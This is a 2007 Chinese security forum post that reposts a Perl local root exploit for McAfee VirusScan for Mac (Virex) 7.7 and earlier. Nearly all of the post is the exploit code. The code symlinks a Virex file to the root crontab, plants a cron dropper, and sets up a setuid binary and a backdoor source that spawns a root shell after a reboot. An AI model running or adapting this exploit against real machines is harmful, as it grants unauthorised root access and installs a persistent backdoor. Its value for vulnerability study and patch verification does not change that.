‹‹ 上一主题 | 下一主题 ››
发新话题
打印

McAfee VirusScan for Mac (Virex) <= 7.7 Local Root Exploit

pub!1c

团队执行官

Rank: 8Rank: 8

E.S.T核心成员

帖子
3926 
精华
128 
积分
209876 
阅读权限
200 
性别
男 
在线时间
1117 小时 
注册时间
2007-10-23 
最后登录
2008-11-17 

资料收集奖 运营支持奖

楼主 发表于 2007-3-4 10:33  只看该作者

McAfee VirusScan for Mac (Virex) <= 7.7 Local Root Exploit

复制内容到剪贴板
代码:
#!/usr/bin/perl
#
# http://www.digitalmunition.com
# written by kf (kf_lists[at]digitalmunition[dot]com)
#
# Following symlinks is bad mmmmmmmmmmkay!
#

$dest = "/var/cron/tabs/root";

$tgts{"0"} = "Virex 7.7.dmg:\"/Library/Application
Support/Virex/VShieldExclude.txt\"  ";

unless (($target) = @ARGV) {
     print "\n\nUsage: $0 <target> \n\nTargets:\n\n";

     foreach $key (sort(keys %tgts)) {
          ($a,$b) = split(/\:/,$tgts{"$key"});
          print "\t$key . $a\n";
     }

     print "\n";
     exit 1;
}

($a,$b) = split(/\:/,$tgts{"$target"});
print "*** Target: $a $b\n";

# Set aside a backdoor that we will chmod and chown later
open(BD,">/tmp/pwnrex.c");
printf BD "main()\n";
printf BD "{ seteuid(0); setegid(0); setuid(0); setgid(0);
system(\"/bin/sh -i\"); }\n";
#system("gcc -o /Users/Shared/shX /tmp/pwnrex.c");
system("cp /usr/bin/id  /Users/Shared/shX");  # this is for those without gcc.

# set aside root crontab dropper
open(PH,">/Users/Shared/droptab.pl");
print PH "system\(\"echo \&#39;* * * * * /usr/sbin/chown root: /Users/Shared/shX; /bin/chmod 4755 /Users/Shared/shX\&#39; > /var/cron/tabs/root\"\)\;\n";

# rm the existing log file and symlink it to the root crontab file. A
reboot will be required to exploit this.
system("rm -rf $b; ln -s $dest $b");

# start up a crontab request that will be *VERY* useful after the machine has rebooted.
system("echo &#39;* * * * * /usr/bin/perl /Users/Shared/droptab.pl; sleep 90; crontab /Users/Shared/xxx&#39; > /tmp/user_cron");
system("echo &#39;* * * * * /usr/bin/id&#39; >  /Users/Shared/xxx");
system("crontab /tmp/user_cron");

print "wait for a reboot and a cron run...\n"

TOP

‹‹ 上一主题 | 下一主题 ››
发新话题